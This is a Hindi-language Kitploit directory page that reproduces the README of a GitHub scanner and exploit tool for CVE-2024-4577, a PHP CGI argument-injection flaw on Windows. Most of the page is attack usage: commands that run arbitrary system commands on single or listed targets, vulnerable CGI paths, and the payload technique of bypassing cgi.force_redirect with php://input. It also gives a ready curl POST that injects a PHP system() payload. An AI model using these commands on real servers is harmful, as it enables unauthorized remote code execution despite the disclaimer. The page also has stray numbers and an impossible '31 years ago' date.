Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-4577 — CVE-2024-4577 के लिए स्कैनर और एक्सप्लॉइट टूल, एक PHP CGI आर्गुमेंट इंजेक्शन कमजोरी जो Windows सिस्टम पर रिमोट कोड निष्पादन सक्षम करती है। इसमें डिटेक्शन और कमांड निष्पादन मॉड्यूल शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/r0otk3r/cve-2024-4577
भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षा
GitHubr0otk3r/cve-2024-4577

CVE-2024-4577

CVE-2024-4577 के लिए स्कैनर और एक्सप्लॉइट टूल, एक PHP CGI आर्गुमेंट इंजेक्शन कमजोरी जो Windows सिस्टम पर रिमोट कोड निष्पादन सक्षम करती है। इसमें डिटेक्शन और कमांड निष्पादन मॉड्यूल शामिल हैं।

रिपॉजिटरी देखें
31 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-4577 - PHP CGI आर्गुमेंट इंजेक्शन RCE

सारांश

CVE-2024-4577 एक गंभीर PHP CGI आर्गुमेंट इंजेक्शन भेद्यता है जो विंडोज़ सिस्टम को प्रभावित करती है जहाँ PHP CGI मोड में चल रहा है। यह दोष दूरस्थ हमलावरों को विशेष रूप से तैयार URL के माध्यम से PHP की कमांड लाइन में आर्गुमेंट इंजेक्ट करने की अनुमति देता है, जिससे दूरस्थ कोड निष्पादन (RCE) होता है।

इस रिपॉजिटरी में शामिल हैं:

  • CVE-2024-4577.py: एक स्कैनर जो कमजोर लक्ष्यों का पता लगाता है।
  • exploit.py: एक एक्सप्लॉइट टूल जो PHP कोड भेजता है और कमजोर सर्वर पर सिस्टम कमांड निष्पादित करता है।

⚠️ अस्वीकरण
यह प्रोजेक्ट केवल शैक्षिक और अधिकृत परीक्षण के लिए है। इस कोड के किसी भी दुरुपयोग के लिए लेखक जिम्मेदार नहीं है। जिम्मेदारी से उपयोग करें और केवल उन वातावरणों में जिनके आप मालिक हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति है।


आवश्यकताएँ

  • Python 3.x
  • requests लाइब्रेरी

निर्भरताएँ स्थापित करें:

root@kitploit:~
pip install -r requirements.txt

स्कैनर का उपयोग

पता लगाएं कि क्या कोई लक्ष्य CVE-2024-4577 के प्रति कमजोर है:

एकल लक्ष्य

root@kitploit:~
python3 CVE-2024-4577.py -u http://target.com

1

फ़ाइल से कई लक्ष्य

root@kitploit:~
python3 CVE-2024-4577.py -f urls.txt

2

कस्टम पथ (वैकल्पिक)

root@kitploit:~
python3 CVE-2024-4577.py -u http://target.com -p /custom/path.php

उदाहरण कमजोर पथ

स्कैनर और एक्सप्लॉइट सामान्य CGI एंडपॉइंट का परीक्षण करते हैं जैसे:

root@kitploit:~
/php-cgi/php-cgi.exe
/index.php
/test.php
/test.hello

पेलोड cgi.force_redirect को बायपास करता है और php://input का उपयोग करके दुर्भावनापूर्ण PHP जोड़ता है।


एक्सप्लॉइट का उपयोग

कमजोर लक्ष्य पर मनमाने सिस्टम कमांड निष्पादित करें:

एकल लक्ष्य

root@kitploit:~
python3 exploit.py -u http://target.com -c "id"

4

फ़ाइल से कई लक्ष्य

root@kitploit:~
python3 exploit.py -f urls.txt -c "id"

5

curl का उपयोग करना

आप curl का उपयोग करके मैन्युअल रूप से भी इस भेद्यता का शोषण कर सकते हैं:

root@kitploit:~
curl -X POST http://target.com/php-cgi/php-cgi.exe -d "<?php system('uname -a'); ?>"

यह सर्वर पर uname -a निष्पादित करने वाला PHP पेलोड भेजता है और आउटपुट लौटाता है।

3

लाइसेंस

यह कोड MIT लाइसेंस के अंतर्गत जारी किया गया है। अधिक जानकारी के लिए LICENSE देखें।


आधिकारिक चैनल

  • YouTube @rootctf
  • X @r0otk3r
टूल डाउनलोड करें